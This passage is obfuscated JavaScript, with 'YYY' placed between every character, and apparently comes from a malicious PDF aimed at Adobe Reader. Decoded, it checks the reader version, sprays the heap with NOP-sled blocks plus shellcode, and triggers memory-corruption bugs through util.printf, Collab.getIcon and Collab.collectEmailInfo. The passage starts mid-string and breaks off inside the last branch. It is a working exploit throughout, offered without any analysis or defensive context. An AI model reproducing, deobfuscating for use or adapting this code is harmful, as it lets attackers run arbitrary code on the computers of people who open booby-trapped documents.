YYDYYY6YYY8YYY9YYY%YYYuYYY1YYYDYYYFYYY8YYY%YYYuYYYBYYYDYYY4YYY7YYY\"YYY+YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYYdYYY_YYYuYYYrYYYlYYY+YYY\"YYY%YYYuYYY0YYY0YYYAYYY6YYY\"YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYnYYYpYYYlYYYaYYYyYYYeYYYrYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYvYYYaYYYrYYY YYYeYYYoYYYbYYYwYYYeYYY=YYY\"YYYpYYY@YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY1YYY YYY:YYY YYYyYYYyYYYyYYYyYYY1YYY1YYY1YYY\"YYY;YYY\rYYY\nYYYuYYYtYYYiYYYlYYY.YYYpYYYrYYYiYYYnYYYtYYYdYYY(YYYeYYYoYYYbYYYwYYYeYYY,YYY YYYnYYYeYYYwYYY YYYDYYYaYYYtYYYeYYY(YYY)YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYgYYYrYYYiYYYzYYYxYYYwYYY=YYY1YYY2YYY0YYY0YYY0YYY;YYY\rYYY\nYYYjYYYuYYYcYYYoYYYbYYYuYYY=YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYkYYYlYYYkYYYnYYYgYYY YYY=YYY YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY=YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYnYYYeYYYwYYYpYYYlYYYaYYYyYYYeYYYrYYY)YYY;YYY\rYYY\nYYYkYYYlYYYkYYYnYYYgYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYkYYYlYYYkYYYnYYYgYYY)YYY;YYY\rYYY\nYYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYkYYYlYYYkYYYnYYYgYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY YYY<YYY=YYY YYY0YYYxYYY8YYY0YYY0YYY0YYY)YYY{YYYkYYYlYYYkYYYnYYYgYYY+YYY=YYYkYYYlYYYkYYYnYYYgYYY;YYY}YYY\rYYY\nYYYkYYYlYYYkYYYnYYYgYYY=YYYkYYYlYYYkYYYnYYYgYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYY(YYY0YYY,YYY0YYYxYYY8YYY0YYY0YYY0YYY YYY-YYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY(YYYfYYYzYYYfYYYwYYYaYYYmYYY=YYY0YYY;YYYfYYYzYYYfYYYwYYYaYYYmYYY<YYYgYYYrYYYiYYYzYYYxYYYwYYY;YYYfYYYzYYYfYYYwYYYaYYYmYYY+YYY+YYY)YYY YYY{YYYjYYYuYYYcYYYoYYYbYYYuYYY[YYYfYYYzYYYfYYYwYYYaYYYmYYY]YYY=YYYkYYYlYYYkYYYnYYYgYYY YYY+YYY YYYhYYYwYYYjYYYnYYYaYYYlYYYbYYY8YYY;YYY}YYY\rYYY\nYYYiYYYfYYY(YYYgYYYrYYYiYYYzYYYxYYYwYYY)YYY{YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYYtYYYrYYYyYYY YYY{YYYtYYYhYYYiYYYsYYY.YYYmYYYeYYYdYYYiYYYaYYY.YYYnYYYeYYYwYYYPYYYlYYYaYYYyYYYeYYYrYYY(YYYnYYYuYYYlYYYlYYY)YYY;YYY}YYY YYYcYYYaYYYtYYYcYYYhYYY(YYYeYYY)YYY YYY{YYY}YYYkYYYzYYYbYYYvYYYeYYY(YYY)YYY;YYY}YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYpYYYaYYYyYYYlYYYoYYYaYYYdYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYpYYYrYYYiYYYnYYYtYYYfYYY)YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYnYYYoYYYpYYY YYY=YYY\"YYY\"YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYYCYYYnYYYtYYY=YYY1YYY2YYY8YYY;YYYiYYYCYYYnYYYtYYY>YYY=YYY0YYY;YYY-YYY-YYYiYYYCYYYnYYYtYYY)YYY YYYnYYYoYYYpYYY YYY+YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYY YYY+YYY YYYpYYYaYYYyYYYlYYYoYYYaYYYdYYY;YYY\rYYY\nYYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY2YYY0YYY;YYY\rYYY\nYYYsYYYpYYYrYYYaYYYyYYY YYY=YYY YYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY+YYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY YYY(YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYYsYYYpYYYrYYYaYYYyYYY)YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY+YYY=YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYsYYYpYYYrYYYaYYYyYYY)YYY;YYY\rYYY\nYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYbYYYiYYYgYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY-YYYsYYYpYYYrYYYaYYYyYYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY+YYYsYYYpYYYrYYYaYYYyYYY YYY<YYY YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY)YYY YYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY+YYYbYYYlYYYoYYYcYYYkYYY+YYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYmYYYeYYYmYYY YYY=YYY YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYYiYYY<YYY1YYY4YYY0YYY0YYY;YYYiYYY+YYY+YYY)YYY YYYmYYYeYYYmYYY[YYYiYYY]YYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY YYY+YYY YYYhYYYeYYYaYYYpYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYnYYYuYYYmYYY YYY=YYY YYY1YYY2YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY9YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY8YYY;YYY\rYYY\nYYYuYYYtYYYiYYYlYYY.YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY\"YYY%YYY4YYY5YYY0YYY0YYY0YYYfYYY\"YYY,YYYnYYYuYYYmYYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY)YYY)YYY;YYY\rYYY\nYYY\rYYY\nYYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY YYY+YYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY;YYY\rYYY\nYYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY YYY\rYYY\nYYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY1YYY0YYY;YYY\rYYY\nYYYaYYYcYYYlYYY YYY=YYY YYYhYYYeYYYaYYYdYYYeYYYrYYYsYYYiYYYzYYYeYYY+YYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY\rYYY\nYYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY YYY(YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYYaYYYcYYYlYYY)YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY+YYY=YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYaYYYcYYYlYYY)YYY;YYY\rYYY\nYYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYY YYYnYYYoYYYpYYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY-YYYaYYYcYYYlYYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYbYYYlYYYoYYYcYYYkYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY+YYYaYYYcYYYlYYY<YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY)YYY YYYbYYYlYYYoYYYcYYYkYYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY+YYYbYYYlYYYoYYYcYYYkYYY+YYYfYYYiYYYlYYYlYYYbYYYlYYYoYYYcYYYkYYY;YYY\rYYY\nYYYmYYYeYYYmYYYoYYYrYYYyYYY YYY=YYY YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYYiYYY<YYY1YYY8YYY0YYY;YYYiYYY+YYY+YYY)YYY YYYmYYYeYYYmYYYoYYYrYYYyYYY[YYYiYYY]YYY YYY=YYY YYYbYYYlYYYoYYYcYYYkYYY YYY+YYY YYYgYYYaYYYrYYYbYYYaYYYgYYYeYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY YYY=YYY YYY4YYY0YYY1YYY2YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYbYYYuYYYfYYYfYYYeYYYrYYY YYY=YYY YYYAYYYrYYYrYYYaYYYyYYY(YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYiYYY=YYY0YYY;YYY YYYiYYY<YYYbYYYuYYYfYYYfYYYeYYYrYYYsYYYiYYYzYYYeYYY;YYY YYYiYYY+YYY+YYY)YYY\rYYY\nYYY{YYY\rYYY\nYYYbYYYuYYYfYYYfYYYeYYYrYYY[YYYiYYY]YYY YYY=YYY YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYY0YYYaYYY%YYY0YYYaYYY%YYY0YYYaYYY%YYY0YYYaYYY\"YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYCYYYoYYYlYYYlYYYaYYYbYYY.YYYgYYYeYYYtYYYIYYYcYYYoYYYnYYY(YYYbYYYuYYYfYYYfYYYeYYYrYYY+YYY\"YYY_YYYNYYY.YYYbYYYuYYYnYYYdYYYlYYYeYYY\"YYY)YYY;YYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYcYYYoYYYlYYYlYYYaYYYbYYY(YYY)YYY YYY{YYY\rYYY\nYYY\rYYY\nYYYfYYYuYYYnYYYcYYYtYYYiYYYoYYYnYYY YYYfYYYiYYYxYYY_YYYiYYYtYYY(YYYyYYYaYYYrYYYsYYYpYYY,YYYlYYYeYYYnYYY)YYY YYY{YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYyYYYaYYYrYYYsYYYpYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY*YYY2YYY<YYYlYYYeYYYnYYY)YYY YYY{YYY YYYyYYYaYYYrYYYsYYYpYYY+YYY=YYYyYYYaYYYrYYYsYYYpYYY;YYY YYY}YYY\rYYY\nYYYyYYYaYYYrYYYsYYYpYYY=YYYyYYYaYYYrYYYsYYYpYYY.YYYsYYYuYYYbYYYsYYYtYYYrYYYiYYYnYYYgYYY(YYY0YYY,YYYlYYYeYYYnYYY/YYY2YYY)YYY;YYY\rYYY\nYYYrYYYeYYYtYYYuYYYrYYYnYYY YYYyYYYaYYYrYYYsYYYpYYY;YYY YYY}YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY(YYYsYYYhYYYcYYYoYYYdYYYeYYY_YYYcYYYoYYYlYYYlYYYaYYYbYYY)YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYmYYYeYYYmYYY_YYYaYYYrYYYrYYYaYYYyYYY=YYYnYYYeYYYwYYY YYYAYYYrYYYrYYYaYYYyYYY(YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYcYYYcYYY=YYY0YYYxYYY0YYYcYYY0YYYcYYY0YYYcYYY0YYYcYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYaYYYdYYYdYYYrYYY=YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY0YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYcYYY_YYYlYYYeYYYnYYY=YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY*YYY2YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYlYYYeYYYnYYY=YYYaYYYdYYYdYYYrYYY-YYY(YYYsYYYcYYY_YYYlYYYeYYYnYYY+YYY0YYYxYYY3YYY8YYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYyYYYaYYYrYYYsYYYpYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY9YYY0YYY9YYY0YYY%YYYuYYY9YYY0YYY9YYY0YYY\"YYY)YYY;YYY\rYYY\nYYYyYYYaYYYrYYYsYYYpYYY=YYYfYYYiYYYxYYY_YYYiYYYtYYY(YYYyYYYaYYYrYYYsYYYpYYY,YYYlYYYeYYYnYYY)YYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYcYYYoYYYuYYYnYYYtYYY2YYY=YYY(YYYcYYYcYYY-YYY0YYYxYYY4YYY0YYY0YYY0YYY0YYY0YYY)YYY/YYYaYYYdYYYdYYYrYYY;YYY\rYYY\nYYYfYYYoYYYrYYY(YYYvYYYaYYYrYYY YYYcYYYoYYYuYYYnYYYtYYY=YYY0YYY;YYYcYYYoYYYuYYYnYYYtYYY<YYYcYYYoYYYuYYYnYYYtYYY2YYY;YYYcYYYoYYYuYYYnYYYtYYY+YYY+YYY)YYY YYY{YYYmYYYeYYYmYYY_YYYaYYYrYYYrYYYaYYYyYYY[YYYcYYYoYYYuYYYnYYYtYYY]YYY=YYYyYYYaYYYrYYYsYYYpYYY+YYYsYYYhYYYeYYYlYYYlYYYcYYYoYYYdYYYeYYY;YYY YYY}YYY\rYYY\nYYYvYYYaYYYrYYY YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY=YYYuYYYnYYYeYYYsYYYcYYYaYYYpYYYeYYY(YYY\"YYY%YYYuYYY0YYYcYYY0YYYcYYY%YYYuYYY0YYYcYYY0YYYcYYY\"YYY)YYY;YYY\rYYY\nYYYwYYYhYYYiYYYlYYYeYYY(YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY<YYY4YYY4YYY9YYY5YYY2YYY)YYY YYY{YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY+YYY=YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY;YYY YYY}YYY\rYYY\nYYYtYYYhYYYiYYYsYYY.YYYcYYYoYYYlYYYlYYYaYYYbYYYSYYYtYYYoYYYrYYYeYYY=YYYCYYYoYYYlYYYlYYYaYYYbYYY.YYYcYYYoYYYlYYYlYYYeYYYcYYYtYYYEYYYmYYYaYYYiYYYlYYYIYYYnYYYfYYYoYYY(YYY YYY{YYY YYYsYYYuYYYbYYYjYYY:YYY\"YYY\"YYY,YYYmYYYsYYYgYYY:YYYoYYYvYYYeYYYrYYYfYYYlYYYoYYYwYYY YYY}YYY YYY)YYY;YYY YYY\rYYY\nYYY\rYYY\nYYY}YYY\rYYY\nYYY\rYYY\nYYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY YYY=YYY YYYaYYYpYYYpYYY.YYYpYYYlYYYuYYYgYYYIYYYnYYYsYYY;YYY\rYYY\nYYYvYYYaYYYrYYY YYYsYYYvYYY=YYYpYYYaYYYrYYYsYYYeYYYIYYYnYYYtYYY(YYYaYYYpYYYpYYY.YYYvYYYiYYYeYYYwYYYeYYYrYYYVYYYeYYYrYYYsYYYiYYYoYYYnYYY.YYYtYYYoYYYSYYYtYYYrYYYiYYYnYYYgYYY(YYY)YYY.YYYcYYYhYYYaYYYrYYYAYYYtYYY(YYY0YYY)YYY)YYY;YYY\rYYY\nYYYfYYYoYYYrYYY YYY(YYYvYYYaYYYrYYY YYYiYYY=YYY0YYY;YYY YYYiYYY YYY<YYY YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY.YYYlYYYeYYYnYYYgYYYtYYYhYYY;YYY YYYiYYY+YYY+YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYiYYYfYYY YYY(YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY[YYYiYYY]YYY.YYYnYYYaYYYmYYYeYYY=YYY=YYY\"YYYEYYYSYYYcYYYrYYYiYYYpYYYtYYY\"YYY)YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY YYY YYYvYYYaYYYrYYY YYYlYYYvYYY=YYYaYYYPYYYlYYYuYYYgYYYiYYYnYYYsYYY[YYYiYYY]YYY.YYYvYYYeYYYrYYYsYYYiYYYoYYYnYYY;YYY\rYYY\nYYY YYY YYY YYY YYY YYY YYY}YYY\rYYY\nYYY YYY YYY}YYY YYY YYY\rYYY\nYYYiYYYfYYY YYY(YYY(YYYlYYYvYYY=YYY=YYY9YYY)YYY|YYY|YYY(YYY(YYYsYYYvYYY=YYY=YYY8YYY)YYY&YYY&YYY(YYYlYYYvYYY<YYY=YYY8YYY.YYY1YYY2YYY)YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYgYYYeYYYtYYYiYYYcYYYoYYYnYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYYlYYYvYYY=YYY=YYY7YYY.YYY1YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYpYYYrYYYiYYYnYYYtYYYfYYY(YYY)YYY;YYY\rYYY\nYYY YYY YYY}YYY\rYYY\nYYYeYYYlYYYsYYYeYYY YYYiYYYfYYY YYY(YYY(YYY(YYYsYYYvYYY=YYY=YYY6YYY)YYY|YYY|YYY(YYYsYYYvYYY=YYY=YYY7YYY)YYY)YYY&YYY&YYY(YYYlYYYvYYY<YYY7YYY.YYY1YYY1YYY)YYY)YYY\rYYY\nYYY YYY YYY{YYY\rYYY\nYYY YYY YYY YYY YYYcYYYoYYYlYYYlYYYaYYYbYYY(YYY)YYY;YYY\rYYY\nYYY YYY 